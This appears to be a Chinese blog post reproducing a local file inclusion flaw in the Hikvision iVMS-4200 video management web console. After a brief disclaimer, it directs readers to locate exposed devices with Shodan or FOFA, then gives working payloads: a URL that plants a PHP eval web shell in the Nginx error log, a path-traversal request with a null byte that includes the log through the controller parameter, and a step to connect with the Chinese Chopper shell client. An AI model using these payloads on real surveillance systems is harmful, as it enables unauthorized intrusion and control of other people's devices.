zoukankan      html  css  js  c++  java
  • Hikvision iVMS 4200 /index.php 本地文件包含漏洞复现

    声明

    本文内容仅供学习交流使用,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。


     一、漏洞介绍

    iVMS-4200适用于嵌入式网络硬盘录像机、混合型网络硬盘录像机、网络视频服务器、NVR、IP Camera和解码设备以及视音频编解码卡,支持实时预览、远程回放和下载、资源管理、远程配置、用户管理、系统配置等多种功能。

    简单来说,它包含了一个WEB版的控制台,用到了一个比较小众的框架,然后被这个Xphp的框架卖了。

    漏洞出现在controller参数的一个任意文件包含。

    二、查找设备

    利用shodan、FOFA等查找iVMS-4200的设备

     三、漏洞复现

    1、首先构造URL访问,使其记录在error.log中

    http://xxx.xxx.xxx.xxx:xx/<?eval($_POST['pass'])?>
    

    2、 直接包含这个客户端自带的Nginx日志文件

    http://xxx.xxx.xxx.xxx:xx/index.php?controller=../../../../Server/logs/error.log%00.php 
    

    (此处不截图,自行测试查看)

    3、中国菜刀连接

  • 相关阅读:
    cf B. Vasily the Bear and Fly
    hdu 3339 In Action
    hdu 六度分离
    cf A. Vasily the Bear and Triangle
    cf C. Secrets
    2.19学习笔记|2.20学习笔记
    VAE代码学习
    2.9日学习记录
    deconvolution反卷积(待学习)
    gamma分布学习
  • 原文地址:https://www.cnblogs.com/charon1937/p/13819747.html
Copyright © 2011-2022 走看看